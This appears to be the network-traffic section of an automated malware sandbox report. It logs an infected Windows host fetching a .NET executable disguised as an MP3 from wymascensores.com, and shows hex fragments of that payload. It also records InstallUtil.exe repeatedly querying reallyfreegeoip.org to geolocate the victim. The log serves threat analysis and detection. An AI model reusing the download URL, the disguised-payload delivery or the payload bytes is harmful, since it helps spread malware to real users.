                        2024-09-26 07:58:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:07 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.549711188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:11 UTC675INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:11 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2323
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cX8MjybkuNiKBUVHk1jw0q1IaP6mKvo9zX8mW5YWXoFJro%2FOWfoeybDdQVn0yqUZhLqLrder34gSe83cFWr3xWNXRnzrQgmsyo9%2FxhCi00ftBEN9XnX3D44SF3dn%2FnDGjJ464n8T"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b51c7a0d426b-EWR
                        2024-09-26 07:58:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:11 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.54971267.212.175.1624435332C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:12 UTC86OUTGET /panel/Skdqhzzwa.mp3 HTTP/1.1
                        Host: wymascensores.com
                        Connection: Keep-Alive
                        2024-09-26 07:58:12 UTC210INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:11 GMT
                        Server: Apache
                        Last-Modified: Wed, 25 Sep 2024 23:10:38 GMT
                        Accept-Ranges: bytes
                        Content-Length: 1841152
                        Connection: close
                        Content-Type: audio/mpeg
                        2024-09-26 07:58:12 UTC7982INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                        2024-09-26 07:58:12 UTC8000INData Raw: 36 33 32 30 34 46 43 37 46 34 37 37 36 31 37 45 37 46 30 32 30 30 30 34 37 42 36 39 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 31 30 30 30 30 32 42 38 30 34 41 30 30 30 30 30 34 32 30 31 38 30 30 30 30 30 30 33 38 31 34 46 39 46 46 46 46 32 30 45 46 31 31 43 34 38 36 32 30 42 36 43 37 37 36 34 46 36 31 32 30 43 32 35 31 31 34 39 39 36 31 37 45 37 46 30 32 30 30 30 34 37 42 35 34 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 30 32 43 38 42 45 36 36 45 32 30 39 35 33 31 45 30 33 30 36 31 37 45 37 46 30 32 30 30 30 34 37 42 34 42 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 34 34 30 30 30 30 30
                        Data Ascii: 63204FC7F477617E7F0200047B69020004617EBE020004283F090006281100002B804A00000420180000003814F9FFFF20EF11C48620B6C7764F6120C2511499617E7F0200047B54020004617EBE020004283F090006202C8BE66E209531E030617E7F0200047B4B020004617EBE020004283F090006281200002B804400000
                        2024-09-26 07:58:12 UTC8000INData Raw: 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 36 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 30 30 33 30 30 30 36 32 30 30 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33
                        Data Ascii: 0004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000162A0000001330030004000000000000000000002A1330030004000000000000000000002A13300300800000000100001128800300062002000000FE0E00003
                        2024-09-26 07:58:12 UTC8000INData Raw: 30 30 34 37 30 30 30 30 30 30 33 30 30 32 30 30 30 30 37 37 30 32 30 30 30 30 33 41 30 30 30 30 30 30 31 42 30 30 30 30 30 31 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 30 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 45 30 30 30 30 30 30 33 38 32 41 30 30 30 30 30 30 37 45 39 39 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 39 33 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 41 30 32 30 30 30 34 32 38 41 46 30
                        Data Ascii: 004700000030020000770200003A0000001B00000113300300800000000100001128800300062001000000FE0E00003800000000FE0C000045030000002F000000050000002E000000382A0000007E9902000428AB08000620000000007E7F0200047B930200043ACCFFFFFF26200000000038C1FFFFFF2A7E9A02000428AF0
                        2024-09-26 07:58:12 UTC8000INData Raw: 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 39 36 30 32 30 30 30 34 33 39 43 43 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 39 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 37 37 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30
                        Data Ascii: 02000428AF08000620020000007E7F0200047B9602000439CCFFFFFF26200100000038C1FFFFFF2A7E9902000428AB08000620000000007E7F0200047B770200043AA2FFFFFF2620000000003897FFFFFF120000002A000000120000142A000000120000002A000000120000002A000000120000002A000000120000002A000
                        2024-09-26 07:58:12 UTC8000INData Raw: 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 43 46 30 30 30 30 30 30 39 32 30 30 30 30 30 30 36 31 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 39 33 30 30 30 30 30 30 35 39 30 31 30 30 30 30 45 43 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30
                        Data Ascii: 2A1330050004000000000000000000002A0330080004000000000000000000142A4134000002000000CF00000092000000610100008B00000000000000020000009300000059010000EC0100008B000000000000001330040004000000000000000000142A1330050004000000000000000000142A033008000400000000000
                        2024-09-26 07:58:12 UTC8000INData Raw: 30 36 31 45 31 43 31 46 33 39 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 46 31 46 30 41 31 46 33 41 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30
                        Data Ascii: 061E1C1F3906286B030006120609110411051F0F1F0A1F3A06286B030006120511060911041C1F0F1F3B06286B030006120411051106091F0D1F151F3C06286B03000612031104110511061A1C1F3D06286B030006120609110411051F0B1F0A1F3E06286B03000612051106091104181F0F1F3F06286B03000612041105110
                        2024-09-26 07:58:12 UTC8000INData Raw: 31 31 30 30 30 30 30 30 33 38 41 36 46 37 46 46 46 46 30 30 37 45 36 41 30 31 30 30 30 34 37 32 46 35 30 31 30 30 37 30 32 38 42 35 30 33 30 30 30 36 37 33 35 36 30 34 30 30 30 36 32 35 32 38 42 36 30 33 30 30 30 36 31 36 36 41 32 38 42 37 30 33 30 30 30 36 32 35 32 35 32 38 42 36 30 33 30 30 30 36 32 38 42 38 30 33 30 30 30 36 36 39 32 38 42 39 30 33 30 30 30 36 31 33 31 46 32 30 32 30 30 30 30 30 30 30 38 44 31 44 30 30 30 30 30 31 46 45 30 45 31 34 30 30 32 30 30 31 30 30 30 30 30 30 32 30 34 32 30 30 30 30 30 30 35 38 46 45 30 45 32 38 30 30 46 45 30 43 31 34 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 32 38 30 30 39 43 46 45 30 43 31 34 30 30 32 30 30 30 30 30 30 30 30 30 32 30 46 34 30 30 30 30 30 30 32 30 35 31 30 30 30 30 30 30 35 39 39 43 32
                        Data Ascii: 1100000038A6F7FFFF007E6A01000472F501007028B503000673560400062528B6030006166A28B7030006252528B603000628B80300066928B9030006131F20200000008D1D000001FE0E14002001000000204200000058FE0E2800FE0C14002000000000FE0C28009CFE0C1400200000000020F40000002051000000599C2
                        2024-09-26 07:58:12 UTC8000INData Raw: 30 30 46 45 30 43 31 31 30 30 32 30 30 32 30 30 30 30 30 30 46 45 30 43 31 35 30 30 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 35 36 30 30 30 30 30 30 32 30 35 46 30 30 30 30 30 30 35 38 39 43 32 30 39 39 30 30 30 30 30 30 32 30 33 33 30 30 30 30 30 30 35 39 46 45 30 45 31 35 30 30 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 46 45 30 43 31 35 30 30 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 38 36 30 30 30 30 30 30 32 30 32 43 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 43 42 30 30 30 30 30 30 32 30 34 33 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 38 37 30 30 30 30 30 30 32 30 34 39 30 30 30 30 30 30 35 38 39
                        Data Ascii: 00FE0C11002002000000FE0C15009CFE0C110020030000002056000000205F000000589C2099000000203300000059FE0E1500FE0C11002003000000FE0C15009CFE0C110020030000002086000000202C000000599CFE0C1100200300000020CB0000002043000000599CFE0C1100200300000020870000002049000000589
                        2024-09-26 07:58:12 UTC8000INData Raw: 30 30 33 38 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 33 30 36 30 30 30 30 35 33 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 36 32 41 30 30 30 30 31 33 33 30 30 34 30 30 33 34 30 30 30 30 30 30 34 44 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 30 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 34 45 30 30 30 30 31 31 37 45 36 31 30 31 30 30 30 34 38 45 33 41 32 39 30 30 30 30 30
                        Data Ascii: 0038060000060000001B00000100000000000000005306000053060000060000001B000001062A000013300400340000004D00001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B0040006262A1B300600BE0100004E0000117E610100048E3A2900000


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.549714188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:13 UTC677INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:13 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2325
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dg%2BxtN0v23V0DIByp4jMbY0%2BarPSQ8Hhp9qBPu8pUD031GGDAQ5B8pnqGSjA5lKVsbI%2BjKz0doY37YVoFNdEKM6wKOviSaa4jCgoKzM5jmh4njWgHjTvz7TkLm%2B7epON1DB85aBx"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5251ec91a07-EWR
                        2024-09-26 07:58:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:13 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.549722188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:15 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:16 UTC671INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:16 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2328
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Qbsb5Lj9En4AzNX2hkmu0dl8ki9P9tMvMiDeaJJkR5y0jjq%2Fp1jyRMcSQ72C1vyv1WWq2wF0QU1ZZLvdjuwNaUFv8mrayghvugMACiFzRZKxwau0tTMs6AYmuoc4nFX9Yyq7TT1"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b53628857d14-EWR
                        2024-09-26 07:58:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:16 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.549727188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:17 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:17 UTC675INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:17 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2329
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jos0ZlFgPzYo4sPhiEC0IyBD%2B6wSuXklHsY9kPzKyrsYtQkUpEFJ40s33lRJ4iQkf2vo0rLYcNXMsugUujwmjVQ1o4%2BiaGmOpKYmPIPXf0T3ULR5GIVUCRK54ud6L1Zd5tMW%2BAe2"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b541592b435b-EWR
                        2024-09-26 07:58:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:17 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.549728188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:18 UTC681INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:18 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2330
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkqD%2FFR%2BmJYK%2BNppSBYBNlsurAV5eytOAhx9njAqcBJTZZhmAuWAlDsHXmFUZYs5DnXK%2F7V9stANO%2F9ibgHB7fBTUMgQe30uhke4h4qeWMNknWZt2MQhRJCjS%2BLsqdAmNXE3ITQt"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5462f600cd9-EWR
